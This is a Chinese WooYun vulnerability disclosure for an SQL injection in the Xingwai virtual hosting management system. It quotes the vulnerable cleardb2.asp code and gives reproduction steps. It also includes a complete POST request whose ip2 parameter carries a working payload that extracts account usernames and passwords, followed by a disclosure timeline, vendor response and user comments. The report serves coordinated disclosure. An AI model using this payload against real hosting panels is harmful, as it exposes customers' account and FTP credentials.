当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0188834

漏洞标题:星外虚拟主机管理系统SQL注射漏洞

相关厂商:广州星外信息科技有限公司

漏洞作者: applychen

提交时间:2016-03-25 10:50

修复时间:2016-06-27 16:50

公开时间:2016-06-27 16:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-25: 细节已通知厂商并且等待厂商处理中
2016-03-29: 厂商已经确认,细节仅向厂商公开
2016-04-01: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-05-23: 细节向核心白帽子及相关领域专家公开
2016-06-02: 细节向普通白帽子公开
2016-06-12: 细节向实习白帽子公开
2016-06-27: 细节向公众公开

简要描述:

大家熟知的星外虚拟主机管理系统SQL注射,能查询库内所有的用户密码/虚拟主机/FTP等信息,影响广泛。

详细说明:

在/sqladm/cleardb2.asp文件中:

<%
If session("SqlAUID")="" Then
	ef=True
	ec="授权非法,有可能是超时造成的。"
ElseIf Request("id")="" Then
	ef=True
	ec="请输入产品ID!"
ElseIf Instr(1, Request("id"), "'", 1)>0 then
	ef=True
	ec="非法产品ID!"
ElseIf not IsNumeric(Request("id"))  Then
	ef=True
	ec="产品ID应该是数字!"
ElseIf Instr(1, session("username"), "'", 1)>0 then
	ef=True
	ec="非法用户名!"
end if
if not ef then
Set conn=Server.CreateObject("ADODB.Connection")
	conn.Open Application("FreeHostDBlink")
	Set dsph = Server.CreateObject("ADODB.Recordset")	
	Sql="Select * from FreeHost.FreeHost_Product_Sql where id='"&session("SqlAUID")&"'"
			if Instr(1,sql, ";", 1)>0 or Instr(1,sql, "--", 1)>0 then
Response.Write "非法字符!"
Response.End
end if
	dsph.Open Sql,conn,1,3
if dsph.Eof then
	ef=True
	ec="不存在的库ID!"
end if
end if
……
……
for iipsec=1 to 2
'response.write dsph("ip"&iipsec)&iipsec&"<br>"
if not isnull(dsph("ip"&iipsec)) then
	Set dsphip = Server.CreateObject("ADODB.Recordset")	
	Sql="Select * from FreeHost.FreeHost_Product_Sql where (ip1='"&dsph("ip"&iipsec)&"' or ip2='"&Request("ip"&iipsec)&"') and id<>'"&dsph ("id")&"'"
			if Instr(1,sql, ";", 1)>0 or Instr(1,sql, "--", 1)>0 then
Response.Write "非法字符!"
Response.End
end if
	dsphip.Open Sql,conn,1,3
if dsphip.Eof then


注意以下代码:

Sql="Select * from FreeHost.FreeHost_Product_Sql where (ip1='"&dsph("ip"&iipsec)&"' or ip2='"&Request("ip"&iipsec)&"') and id<>'"&dsph ("id")&"'"


可以看到Request("ip"&iipsec)进行获取数据,即:

Request(ip1)
Request(ip1)


这里过滤了;(分号)以及--(注释符)就直接入库查询,造成SQL注射,注意这里还要满足一个IF条件:

if not isnull(dsph("ip"&iipsec)) then


dsph("ip"&iipsec)为从数据库中查询出的远程IP,在setip.asp中设置。
下面进行以**.**.**.**为例进行测试,首先注册一个账户并登录,在左侧点击开通数据库。

1.png


然后找一个能够免费试用进行实时开通(付费的测不起-_-):

3.png


开通成功后点击左侧的数据库管理:

5.png


首先设置远程访问IP(满足IF条件):

7.png


然后点击清空数据库-->马上执行,不可恢复,抓取数据包:

9.png


在POST数据中插入SQL注射的参数ip1或者ip2,完整数据包如下:

POST /sqladm/cleardb2.asp HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/sqladm/cleardb.asp?id=887
Cookie: ASPSESSIONIDAABRQBQA=IEOJAHKBFLGOIKHEPHMACNCB; Hm_lvt_23f149cf9f1c205b13c96c4a43146e0b=1458834688; Hm_lpvt_23f149cf9f1c205b13c96c4a43146e0b=1458835916
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 208
openX=%C2%ED%C9%CF%D6%B4%D0%D0%A3%AC%B2%BB%BF%C9%BB%D6%B8%B4&id=887&ip2=1')/**/and/**/(select/**/substring((select/**/username,password/**/from/**/FreeHost_USER/**/for/**/xml/**/auto),1,4000))=0/**/and('1'='1


查询出登录账户以及密码:

10.png


查询FTP账户密码登录IP:

13.png


列几个受影响的站点:

http://**.**.**.**/sqladm/cleardb2.asp
http://**.**.**.**/sqladm/cleardb2.asp
http://**.**.**.**/sqladm/cleardb2.asp
http://**.**.**.**/sqladm/cleardb2.asp
http://**.**.**.**/sqladm/cleardb2.asp

漏洞证明:

同上

修复方案:

过滤一下request('ip1')与request('ip2')

版权声明:转载请注明来源 applychen@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2016-03-29 16:49

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给广东分中心,由其后续协调网站管理单位处置.

最新状态:

暂无

漏洞评价:

评价

  1. 2016-03-25 10:53 | komas ( 普通白帽子 | Rank:107 漏洞数:25 )

    这个危害就大了

  2. 2016-03-25 10:56 | 数据流 认证白帽子 ( 普通白帽子 | Rank:817 漏洞数:100 | 没关系啊,我们还有音乐)

    星外呀 怀恋以前 ....

  3. 2016-03-25 10:57 | 狗狗侠 认证白帽子 ( 普通白帽子 | Rank:518 漏洞数:58 | 我是狗狗侠)

    屌屌的陈老师

  4. 2016-03-25 10:57 | 路人毛 ( 普通白帽子 | Rank:157 漏洞数:64 | 要想Rank给高,标题一定得屌)

    屌!

  5. 2016-03-25 10:58 | _Thorns ( 普通白帽子 | Rank:1754 漏洞数:269 | 以大多数人的努力程度之低,根本轮不到去拼...)

    简直6.

  6. 2016-03-25 10:58 | x7iao ( 普通白帽子 | Rank:395 漏洞数:56 | 文能床上控萝莉,武能床上定人妻)

    卧槽 好6

  7. 2016-03-25 10:58 | JutaZ ( 实习白帽子 | Rank:95 漏洞数:14 | 少壮不努力老大徒伤悲)

    6666

  8. 2016-03-25 10:59 | Taro ( 普通白帽子 | Rank:349 漏洞数:86 | 走向最远的方向,哪怕前路迷茫;抱着最大的...)

    以前被星外搞得头痛,今天喜闻乐见

  9. 2016-03-25 10:59 | Bear baby ( 普通白帽子 | Rank:238 漏洞数:28 | 总感觉我会在哪天突然顿悟。)

    必须占位

  10. 2016-03-25 10:59 | 路人毛 ( 普通白帽子 | Rank:157 漏洞数:64 | 要想Rank给高,标题一定得屌)

    我去 本来还是白的 突然闪电加三刀

  11. 2016-03-25 11:00 | 0x 80 ( 普通白帽子 | Rank:1864 漏洞数:509 | If we give enough, if we learn to trust ...)

    围观

  12. 2016-03-25 11:01 | DloveJ ( 普通白帽子 | Rank:1427 漏洞数:255 | 专业潜水哒~)

    66

  13. 2016-03-25 11:01 | erhuo ( 普通白帽子 | Rank:164 漏洞数:39 | 666)

    CCAV看这里!CCAV看这里!CCAV看这里!

  14. 2016-03-25 11:03 | f4ckbaidu ( 普通白帽子 | Rank:265 漏洞数:33 | 开发真是日了狗了)

    $$$$$$

  15. 2016-03-25 11:10 | 从容 ( 普通白帽子 | Rank:415 漏洞数:99 | 哇啦啦啦啦啦 我的宝贝 | Tr3jer@Gmail.c...)

    6

  16. 2016-03-25 11:11 | Xser ( 普通白帽子 | Rank:408 漏洞数:92 | JDSec)

    牛逼啊

  17. 2016-03-25 11:16 | 这只猪 ( 路人 | Rank:24 漏洞数:6 | )(2009年荣获CCAV首届挖洞大使称号)(★★★...)

    收藏

  18. 2016-03-25 11:20 | Ton7BrEak ( 普通白帽子 | Rank:350 漏洞数:70 | ☁ 我要继续努力!)

    留名

  19. 2016-03-25 11:21 | pudding2 ( 普通白帽子 | Rank:151 漏洞数:52 | 凡心所向,素履所往,生如逆旅,一苇以航)

    膜拜大神

  20. 2016-03-25 11:41 | 木易 ( 普通白帽子 | Rank:347 漏洞数:70 | 不,,不要误会,我不是针对谁,我是说在座...)

  21. 2016-03-25 11:41 | 狼牙月 ( 实习白帽子 | Rank:47 漏洞数:14 | 水不撩怎知深浅 人不拼怎知输赢)

    666666出口恶气

  22. 2016-03-25 11:53 | 带我玩 ( 路人 | Rank:16 漏洞数:8 | 带我玩)

    666666出口恶气

  23. 2016-03-25 11:56 | Aasron ( 普通白帽子 | Rank:905 漏洞数:163 | raw_input("你知道我要输入什么?"))

    这个雷和刀 是我努力的方向啊

  24. 2016-03-25 12:19 | hh2014 ( 普通白帽子 | Rank:1106 漏洞数:255 | )

    666

  25. 2016-03-25 12:24 | 糖剩七颗 ( 普通白帽子 | Rank:674 漏洞数:90 | 当几个月码农再出来冒泡!)

    星外服务器满满的记忆啊

  26. 2016-03-25 12:49 | Vinc ( 普通白帽子 | Rank:383 漏洞数:58 | 提莫队长正在待命!)

    66

  27. 2016-03-25 13:08 | discovery ( 路人 | Rank:9 漏洞数:3 | www.google.com)

    以前一个 xss 就搞定 好回忆啊.

  28. 2016-03-25 13:13 | 10457793 ( 普通白帽子 | Rank:1063 漏洞数:170 | You are on my list!)

    支付6乌云币查看POC

  29. 2016-03-25 13:28 | von ( 路人 | Rank:18 漏洞数:8 | 一个帅字贯穿了我的一生~)

    后排卖瓜~

  30. 2016-03-25 13:34 | autO_pw ( 实习白帽子 | Rank:81 漏洞数:25 | o_O``)

    buff加满了没?

  31. 2016-03-25 13:37 | 0h1in9e ( 实习白帽子 | Rank:68 漏洞数:23 | 林歌 | 峨眉山下修炼中的<网络安全></web开...)

    漏洞标题后面的“乌云”和“$”符是什么意思哦?(小白初入乌云,……)

  32. 2016-03-25 13:38 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1888 漏洞数:156 | 不要患得患失,我羡慕你,但是我还是选择做...)

    @0h1in9e 精华漏洞 和人民币奖励的意思。

  33. 2016-03-25 13:43 | ANS5 ( 普通白帽子 | Rank:349 漏洞数:107 | 此心安处是吾乡)

    这样的三个$$$加个打雷 有多少钱?

  34. 2016-03-25 13:47 | Mayter ( 普通白帽子 | Rank:165 漏洞数:40 | 笼鸡有食汤锅近,野鹤无粮天地宽.)

    炫的不行

  35. 2016-03-25 13:52 | Mark0smith ( 普通白帽子 | Rank:176 漏洞数:71 )

    6

  36. 2016-03-25 13:59 | 牛 小 帅 ( 普通白帽子 | Rank:1597 漏洞数:386 | bye)

    闪电没了

  37. 2016-03-25 14:03 | ANS5 ( 普通白帽子 | Rank:349 漏洞数:107 | 此心安处是吾乡)

    闪电没了

  38. 2016-03-25 14:04 | 路人毛 ( 普通白帽子 | Rank:157 漏洞数:64 | 要想Rank给高,标题一定得屌)

    电没了

  39. 2016-03-25 14:14 | 继续沉默 ( 实习白帽子 | Rank:62 漏洞数:9 | 好好学习,天天向上)

    好想艹翻星外啊

  40. 2016-03-25 14:49 | 从容 ( 普通白帽子 | Rank:415 漏洞数:99 | 哇啦啦啦啦啦 我的宝贝 | Tr3jer@Gmail.c...)

    闪电呢?.。。

  41. 2016-03-25 15:03 | 残废 ( 普通白帽子 | Rank:274 漏洞数:58 | 我是残废,啦啦啦啦)

    后排膜拜陈老师

  42. 2016-03-25 15:34 | 暴走 ( 普通白帽子 | Rank:615 漏洞数:107 | 专心补刀。)

    闪电没有了!

  43. 2016-03-25 15:46 | Mr.li ( 普通白帽子 | Rank:106 漏洞数:36 | 爱萌妹子的骚年~)

    咳咳

  44. 2016-03-25 16:08 | 慢慢 ( 普通白帽子 | Rank:864 漏洞数:226 | 低调求发展)

    闪电没有了?

  45. 2016-03-25 16:11 | Gabriel ( 普通白帽子 | Rank:152 漏洞数:40 )

    什么时候也能来三刀

  46. 2016-03-25 16:35 | huotoo ( 路人 | Rank:24 漏洞数:5 | 努力学习中)

    这个屌啊

  47. 2016-03-25 17:02 | imp0rt ( 普通白帽子 | Rank:117 漏洞数:54 | 。)

    闪电呢。

  48. 2016-03-25 17:04 | 小牛牛 ( 普通白帽子 | Rank:139 漏洞数:17 | 求带)

    6666666可以的,,

  49. 2016-03-25 17:24 | 无名 ( 实习白帽子 | Rank:41 漏洞数:9 | 我是一只小菜鸟呀,伊雅伊尔哟。)

    卧槽

  50. 2016-03-25 18:33 | 带头大哥 ( 普通白帽子 | Rank:879 漏洞数:258 | |任意邮件伪造| |目录遍历| |任意文件读取|...)

    闪电呢,对得起陈老师么,要求加闪电,泼出去的水还收回去了~!~楼下你说呢!

  51. 2016-03-25 21:25 | watcher ( 路人 | Rank:18 漏洞数:6 | ~)

    对啊,闪电本来有的,怎么撤回了。

  52. 2016-03-25 21:36 | Safe ( 路人 | Rank:0 漏洞数:1 | 一个平凡的人)

    怎么厉害

  53. 2016-03-25 22:54 | 0h1in9e ( 实习白帽子 | Rank:68 漏洞数:23 | 林歌 | 峨眉山下修炼中的<网络安全></web开...)

    @小胖子 mark

  54. 2016-03-26 08:40 | sysALong ( 普通白帽子 | Rank:464 漏洞数:101 | 在我们黑龙江这噶哒,就没有什么事是【撸串...)

    多余了,看我签名。

  55. 2016-03-28 09:13 | kevinchowsec ( 实习白帽子 | Rank:94 漏洞数:21 | 周凯文,信息安全爱好者。)

    倒一堆虚拟机

  56. 2016-03-28 16:56 | 雷锋 ( 路人 | Rank:12 漏洞数:2 )

    @ANS5打雷是精华 刀是现金奖励 @0h1in9e 一刀应该是500吧

  57. 2016-03-28 17:22 | 8点半 ( 路人 | Rank:16 漏洞数:5 | 你当哥是CPU啊,人生价值就是执行指令?)

    星外技术说是旧版本的- -

  58. 2016-03-29 23:57 | applychen 认证白帽子 ( 普通白帽子 | Rank:667 漏洞数:58 | 万古漫漫长如夜)

    @8点半 测试的一个站最近的升级日期是2016-2-1同样存在此漏洞,另外闪电被取消是因为漏洞简单不够标准,最后吐槽一下这RANK实在是给低了。

  59. 2016-03-30 16:27 | 8点半 ( 路人 | Rank:16 漏洞数:5 | 你当哥是CPU啊,人生价值就是执行指令?)

    @applychen (┬_┬)